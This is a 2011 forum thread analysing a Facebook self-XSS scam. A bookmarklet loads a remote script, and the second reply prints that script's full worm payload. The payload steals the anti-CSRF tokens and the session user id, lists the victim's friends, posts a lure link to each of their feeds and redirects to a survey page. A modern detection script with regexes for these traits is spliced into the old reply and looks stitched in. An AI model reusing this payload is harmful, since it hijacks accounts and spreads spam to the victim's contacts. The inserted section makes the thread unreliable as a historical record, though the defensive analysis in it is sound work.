-
May 16th, 2011, 04:15 PM
#1
what does this code mean
There is a JavaScript code going around Facebook and I am curious as to what it does. They give an example but it didn't work. Also, I don't want to run any old code on this machine. Thank you, Mike
Code:
javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://bdatero.info/y.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();
I am not a coder but a network guy; all help is greatly appreciated.
Here is the URL: http://tadero.info/engl.php
-
May 16th, 2011, 04:56 PM
#2
It's getting its source from here:
'http://bdatero.info/y.js?'+(Math.random())
and doesn't have any actual code in itself other than referring to the source on that website. My guess is that the Math.random() is used in the URL to make it harder for Firefox and other websites to warn that it is unsafe? I'm not sure though, as they could just set the whole domain as 'unsafe' to produce the warning. It looks sketchy to me. I went to the link directly in my browser, so as to not run the script.
var message = "Awesome! A new way to see your profile's full stats. I just checked how many people have viewed my profile and how much time I spent on FB this month . Scan your profile and let me know how popular YOU are.";
var jsText = "http://tdadero.info/gop.php";
var myText = "Scan Profile";
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var friends = new Array();
gf = new XMLHttpRequest();
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
gf.send();
if(gf.readyState!=4){ }else{
data = eval('(' + gf.responseText.substr(9) + ')');
if(data.error){ }else{
friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
}
}
for(var i=0; i<friends.length; i++){
var httpwp = new XMLHttpRequest();
var urlwp = "/fbml/ajax/prompt_feed.php?__a=1";
var paramswp = "&__d=1&app_id=6261817190&extern=1&" +
"&post_form_id=" + post_form_id +
"&fb_dtsg=" + fb_dtsg +
"&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
"&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
"&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
"&user_message=" + message;
httpwp.open("POST", urlwp, true);
httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
httpwp.setRequestHeader("Content-length", paramswp.length);
httpwp.setRequestHeader("Connection", "keep-alive");
httpwp.onreadystatechange = function(){
if (httpwp.readyState == 4 && httpwp.status == 200){
}
}
httpwp.send(paramswp);
}
alert("Account verification failed. Please proceed to next step to verify your account.");
window.location = "http://basopu.info/poli/indexen.php"
I'm not very experienced with POST and AJAX, but my guess is this posts a message to Facebook under your ID, and then sends you to this page saying that you couldn't verify your account. This page then asks you to complete a survey, which may be the point of this script as a whole, but there may be other things going on at that site as well, as I never took the time to get past the survey popup to see what else the website had in store.
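To triage a pasted snippet like the one above without running it, here is an added example (not code from any poster in this thread) that statically flags the indicators the reply describes: a `javascript:` bookmarklet that injects a remote script with a random cache-buster, and a payload that reads anti-CSRF tokens, enumerates friends, POSTs in a loop and redirects. The indicator names, regexes and the sample inputs (with placeholder domains) are constructed for this example.

```javascript
// Static triage of pasted "javascript:" snippets. Indicator list and samples are constructed.
const INDICATORS = [
  { id: 'bookmarklet', re: /^\s*javascript:/i, note: 'runs in the context of the current site (self-XSS)' },
  { id: 'remote_script', re: /createElement\(['"]script['"]\)[\s\S]*\.src\s*=\s*['"]https?:\/\//i, note: 'loads code from a third-party host' },
  { id: 'cache_bust', re: /\+\s*\(?\s*Math\.random\(\)/, note: 'random query string defeats caching and URL blocklists' },
  { id: 'csrf_token_read', re: /getElementsByName\(['"](fb_dtsg|post_form_id)['"]\)/, note: 'harvests anti-CSRF tokens to forge requests as the user' },
  { id: 'session_cookie', re: /document\.cookie/, note: 'reads session cookies' },
  { id: 'eval_response', re: /eval\(.*responseText/, note: 'executes a server response as code' },
  { id: 'friend_enum', re: /first_degree\.php/, note: 'enumerates the friend list' },
  { id: 'mass_post', re: /for\s*\([^)]*friends\.length[^)]*\)[\s\S]*\.send\(/, note: 'posts to every friend (worm-like spread)' },
  { id: 'redirect', re: /window\.location\s*=\s*['"]https?:\/\//, note: 'redirects to an external landing page' },
];

// Collect external hosts referenced by the snippet, for blocklisting or proxy-log hunting.
function externalHosts(code) {
  const hosts = new Set();
  for (const m of code.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.add(m[1].toLowerCase());
  return [...hosts].sort();
}

// Return the matched indicator ids, the hosts seen, and a coarse verdict.
function triage(code) {
  const hits = INDICATORS.filter(ind => ind.re.test(code)).map(ind => ind.id);
  let verdict = 'benign-looking';
  if (hits.includes('bookmarklet') && hits.includes('remote_script')) verdict = 'suspicious: remote code loader';
  if (hits.includes('csrf_token_read') && hits.includes('mass_post')) verdict = 'malicious: self-XSS spam worm';
  return { hits, hosts: externalHosts(code), verdict };
}

// Constructed samples mirroring the structure discussed in the thread (placeholder domains).
const LOADER = "javascript:(function(){s=document.createElement('script');s.type='text/javascript';" +
  "s.src='http://example.invalid/y.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(s);})();";
const PAYLOAD = [
  "var post_form_id = document.getElementsByName('post_form_id')[0].value;",
  "var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;",
  "var uid = document.cookie.match(/c_user=(\\d+)/)[1];",
  "gf = new XMLHttpRequest(); gf.open('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + uid, false); gf.send();",
  "data = eval('(' + gf.responseText.substr(9) + ')'); friends = data.payload.entries;",
  "for (var i = 0; i < friends.length; i++) { var x = new XMLHttpRequest(); x.open('POST', '/fbml/ajax/prompt_feed.php', true); x.send('fb_dtsg=' + fb_dtsg + '&to_ids[0]=' + friends[i].uid); }",
  "window.location = 'http://example.invalid/survey.php';",
].join('\n');
const BENIGN = "javascript:void(document.body.style.background='yellow')";

console.log(triage(LOADER), triage(PAYLOAD), triage(BENIGN));
```

Any snippet that scores both `csrf_token_read` and `mass_post` should be treated as account-abusing regardless of what the accompanying message promises.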
-
May 16th, 2011, 05:15 PM
#3
Optional extra:
javascript :R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',50); void(0)
-
May 16th, 2011, 05:39 PM
#4
I've got the actual source for this .js XSS; I've attached a .txt file that contains both parts of the 0-day that was being used.
This has since been patched by Facebook, so it's pretty harmless atm.
Last edited by HYBR|D; October 14th, 2011 at 04:32 AM.
-
May 19th, 2011, 07:59 AM
#5
It's one of those supposedly "stalker" apps that will allow you to see who's been watching your profile.
NONE of those scripts work because FB doesn't expose that data.
http://arstechnica.com/web/news/2011...avoid-them.ars
Oliver's Law:
Experience is something you don't get until just after you need it.